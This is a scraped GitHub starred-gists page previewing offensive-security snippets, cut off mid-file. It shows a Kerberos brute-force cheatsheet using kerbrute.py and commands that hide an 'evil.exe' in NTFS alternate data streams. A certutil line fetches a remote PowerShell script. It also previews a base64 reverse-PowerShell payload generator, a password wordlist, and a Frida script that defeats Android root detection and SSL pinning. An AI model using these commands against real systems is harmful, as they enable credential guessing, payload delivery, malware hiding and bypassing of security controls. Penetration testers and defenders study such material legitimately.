Skip to content

Instantly share code, notes, and snippets.

View secfb's full-sized avatar

Never Mind secfb

74 followers · 495 following
View GitHub Profile
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active May 4, 2024 03:48
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@tothi
tothi / mkpsrevshell.py
Created February 17, 2019 00:05
reverse PowerShell cmdline payload generator (base64 encoded)
#!/usr/bin/env python3
#
# generate reverse powershell cmdline with base64 encoded args
#
import sys
import base64
def help():
print("USAGE: %s IP PORT" % sys.argv[0])
@mdonkers
mdonkers / server.py
Last active April 30, 2024 23:26
Simple Python 3 HTTP server for logging all GET and POST requests
#!/usr/bin/env python3
"""
License: MIT License
Copyright (c) 2023 Miel Donkers
Very simple HTTP server in python for logging requests
Usage::
./server.py [<port>]
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
@muff-in
muff-in / resources.md
Last active April 27, 2024 22:37
A curated list of Assembly Language / Reversing / Malware Analysis / Game Hacking-resources
@mccabe615
mccabe615 / phpdangerousfuncs.md
Last active April 21, 2024 17:04
Dangerous PHP Functions

Command Execution

exec           - Returns last line of commands output
passthru       - Passes commands output directly to the browser
system         - Passes commands output directly to the browser and returns last line
shell_exec     - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen          - Opens read or write pipe to process of a command
proc_open      - Similar to popen() but greater degree of control
pcntl_exec - Executes a program
@cihanmehmet
cihanmehmet / password-wordlist.txt
Created November 19, 2020 11:34
Password Wordlist(235k)
This file has been truncated, but you can view the full file.
password
princess
123456
sunshine
princess1
abc123
jordan23
blessed1
Password1
password1
@securifera
securifera / Filename extension list
Created June 21, 2020 00:31
.php
.html
.txt
.htm
.aspx
.asp
.js
.css
.pgsql.txt
.mysql.txt
@cihanmehmet
cihanmehmet / subdomain_wordlist.md
Last active March 26, 2024 03:12
Subdomain Wordlist
@rootsec1
rootsec1 / fridascript.js
Last active March 25, 2024 07:26
Bypass SSL certificate pinning and evade root detection on Android (Frida script)
Java.perform(function () {
console.log("\nRoot detection bypass with Frida");
var CommonUtils = Java.use("io.fabric.sdk.android.services.common.CommonUtils");
console.log("\nHijacking isRooted function in CommonUtils class");
CommonUtils.isRooted.implementation = function () {
console.log("\nInside the isRooted function");
return false;
};
console.log("\nRoot detection bypassed");
console.log("\n");